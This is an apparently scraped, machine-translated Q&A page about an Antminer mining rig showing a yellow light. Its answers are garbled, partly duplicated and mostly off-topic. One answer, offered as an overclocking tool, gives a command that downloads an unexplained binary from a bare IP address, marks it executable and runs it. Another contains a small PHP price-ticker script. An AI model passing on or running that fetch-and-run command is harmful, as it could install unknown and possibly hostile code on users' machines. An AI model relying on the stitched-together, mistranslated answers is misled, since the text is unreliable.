Ant miner lights yellow
Publish: 2021-04-14 22:14:15
1. It can be understood that the number of unrecognized ore-forming pool in mining machine operation is not able to mine.
the rejection number of ants should not be high, if it is high, it may be other problems
the rejection number of ants should not be high, if it is high, it may be other problems
2. Hello
What miner are you talking about? Is it the S9 of bitcoin ant miner
if your miner is a small ant series miner, you can rece the noise by changing the fan and appropriately recing the chip frequency. But it's still very difficult to keep quiet.
if you have a large amount of electricity, you can choose a professional hosting mine company for hosting. The electricity charge will be cheaper than that of residents, and you don't need to worry about noise problems, which will cause complaints from neighbors.
if you need anything, you can send a private letter to me
What miner are you talking about? Is it the S9 of bitcoin ant miner
if your miner is a small ant series miner, you can rece the noise by changing the fan and appropriately recing the chip frequency. But it's still very difficult to keep quiet.
if you have a large amount of electricity, you can choose a professional hosting mine company for hosting. The electricity charge will be cheaper than that of residents, and you don't need to worry about noise problems, which will cause complaints from neighbors.
if you need anything, you can send a private letter to me
3.
蚂蚁T9+超频、T9超频、S9超频、S9I超频、E3超频、L3+超频、不变功率的研究
先放开源的代码,有能力者可以研究下https://github.com/vavavivi/AntMinerStats
文章所用工具与命令也在网络盘.
wget http://198.13.49.55/statov && chmod 777 statov && ./statov
4. Bitcoin can be understood as a stock, and mining machinery is the employee of the stock. Working for the stock, the stock can be bought and sold as well as transferred as money. When transferring money, users need to pay a service charge, just like bank transfer. The service charge is to pay the wages of the mining machine, so the mining machine has income. After receiving the service charge (BTC), the holder of the mining machine can take it to the exchange to sell it, which is equivalent to making money. Because of the evolution of the market over the years (omitting 10000 words here), now the income is very stable and high, so more and more people are engaged in mining. You can check more on the Internet and search today's miners. There are many articles suitable for Xiao to read.
5. I think the machine is out of order
6. Ant miner efficiency, that is to say, this thing can't work, can't use, don't support.
7. The temperature is too high: one of the double fans is not running, or the speed cannot reach.
8. <?php
$content = file_get_contents("http://api.btc38.com/v1/ticker.php?c=dog");
$obj = json_decode($content);
$array = object_to_array($obj);
echo $array['ticker']['buy'];
function object_to_array($obj){
$_arr = is_object($obj)? get_object_vars($obj) :$obj;
foreach ($_arr as $key => $val){
$val=(is_array($val)) || is_object($val) ? object_to_array($val) :$val;
$arr[$key] = $val;
}
return $arr;
}
?>
$content = file_get_contents("http://api.btc38.com/v1/ticker.php?c=dog");
$obj = json_decode($content);
$array = object_to_array($obj);
echo $array['ticker']['buy'];
function object_to_array($obj){
$_arr = is_object($obj)? get_object_vars($obj) :$obj;
foreach ($_arr as $key => $val){
$val=(is_array($val)) || is_object($val) ? object_to_array($val) :$val;
$arr[$key] = $val;
}
return $arr;
}
?>
Hot content